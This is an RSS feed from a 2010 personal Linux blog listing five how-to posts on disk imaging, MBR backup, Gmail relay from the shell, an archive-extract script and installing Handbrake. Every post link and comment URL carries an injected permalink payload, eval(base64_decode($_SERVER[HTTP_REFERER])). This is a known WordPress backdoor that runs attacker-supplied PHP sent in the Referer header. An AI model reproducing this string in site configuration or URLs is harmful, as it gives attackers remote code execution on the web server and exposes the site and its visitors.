<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	>

<channel>
	<title>Paul's Linux Blog</title>
	<atom:link href="http://pward.co.uk/blog/feed/" rel="self" type="application/rss+xml" />
	<link>http://pward.co.uk/blog</link>
	<description>Just Another Uber-Geek</description>
	<pubDate>Tue, 13 Jul 2010 10:58:13 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.7.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Fixing the disk size after restoring from dd</title>
		<link>http://pward.co.uk/blog/2010/07/13/fixing-the-disk-size-after-restoring-from-dd/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://pward.co.uk/blog/2010/07/13/fixing-the-disk-size-after-restoring-from-dd/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 13 Jul 2010 10:57:03 +0000</pubDate>
		<dc:creator>Paul</dc:creator>
		
		<category><![CDATA[How To]]></category>

		<category><![CDATA[disk]]></category>

		<guid isPermaLink="false">http://pward.co.uk/blog/?p=145</guid>
		<description><![CDATA[I have used partimage on occasion to backup my disk, however one of the issues that used to get me was after restoring an image to a new partition of a larger size the partition would show as the old size.
Here are the steps to resolve this issue.
WARNING: Before making any changes to disks you [...]]]></description>
		<wfw:commentRss>http://pward.co.uk/blog/2010/07/13/fixing-the-disk-size-after-restoring-from-dd/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to backup your MBR</title>
		<link>http://pward.co.uk/blog/2010/06/30/how-to-backup-your-mbr/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://pward.co.uk/blog/2010/06/30/how-to-backup-your-mbr/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 29 Jun 2010 23:37:44 +0000</pubDate>
		<dc:creator>Paul</dc:creator>
		
		<category><![CDATA[How To]]></category>

		<guid isPermaLink="false">http://pward.co.uk/blog/2010/06/30/how-to-backup-your-mbr/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</guid>
		<description><![CDATA[How to backup your MBR
There's not much fun in having to restore your MBR and findiong you can only do this by using the windows mbr recovery console or using the grub installer, an easier way is to make a backup of your mbr now so this does not happen to you. It's easy to [...]]]></description>
		<wfw:commentRss>http://pward.co.uk/blog/2010/06/30/how-to-backup-your-mbr/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How To Use Gmail Account To Relay Email From a Shell Prompt</title>
		<link>http://pward.co.uk/blog/2010/04/17/how-to-use-gmail-account-to-relay-email-from-a-shell-prompt/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://pward.co.uk/blog/2010/04/17/how-to-use-gmail-account-to-relay-email-from-a-shell-prompt/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Sat, 17 Apr 2010 10:04:57 +0000</pubDate>
		<dc:creator>Paul</dc:creator>
		
		<category><![CDATA[How To]]></category>

		<guid isPermaLink="false">http://pward.co.uk/blog/?p=141</guid>
		<description><![CDATA[Usually, you do not need to setup an email server under Linux desktop operating system. Most GUI email clients (such as Thunderbird) supports Gmail POP3 and IMAP configurations. But, how do you send mail via the standard or /usr/bin/mail user agents or a shell script? Programs such as sendmail / postfix / exim can be [...]]]></description>
		<wfw:commentRss>http://pward.co.uk/blog/2010/04/17/how-to-use-gmail-account-to-relay-email-from-a-shell-prompt/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Detect Archive Type and Uncompress Script</title>
		<link>http://pward.co.uk/blog/2010/02/09/detect-archive-type-and-uncompress-script/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://pward.co.uk/blog/2010/02/09/detect-archive-type-and-uncompress-script/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 09 Feb 2010 09:09:26 +0000</pubDate>
		<dc:creator>Paul</dc:creator>
		
		<category><![CDATA[How To]]></category>

		<category><![CDATA[Shell Scripting]]></category>

		<category><![CDATA[Bash]]></category>

		<category><![CDATA[convert]]></category>

		<category><![CDATA[Script]]></category>

		<guid isPermaLink="false">http://pward.co.uk/blog/?p=132</guid>
		<description><![CDATA[Thanks to this great little script you no longer need to work out which program to use to uncompress multiple file archive formats.
Add this script to your .bashrc file and use as follows:
extract file.zip
&#160;
extract &#40;&#41; &#123;
if &#91; -f $1 &#93; ; then
case $1 in
*.&#60;span class=&#34;highlight&#34; style=&#34;border: 1px solid gray; background: yellow none repeat scroll 0% [...]]]></description>
		<wfw:commentRss>http://pward.co.uk/blog/2010/02/09/detect-archive-type-and-uncompress-script/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Handbrake GUI install on Ubuntu at last.</title>
		<link>http://pward.co.uk/blog/2010/02/06/handbrake-gui-install-on-ubuntu-at-last/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://pward.co.uk/blog/2010/02/06/handbrake-gui-install-on-ubuntu-at-last/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Sat, 06 Feb 2010 08:01:13 +0000</pubDate>
		<dc:creator>Paul</dc:creator>
		
		<category><![CDATA[How To]]></category>

		<category><![CDATA[avi]]></category>

		<category><![CDATA[convert]]></category>

		<category><![CDATA[media]]></category>

		<category><![CDATA[software]]></category>

		<guid isPermaLink="false">http://pward.co.uk/blog/?p=125</guid>
		<description><![CDATA[At last I managed to get handbrake-gui on my pc big woohoo.
Not that excited hmm maybe not but I have tried many times to install handbrake, the only success I have had was on windows  I have managed to get the Linux CLI version installed but could not get the out of my files [...]]]></description>
		<wfw:commentRss>http://pward.co.uk/blog/2010/02/06/handbrake-gui-install-on-ubuntu-at-last/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
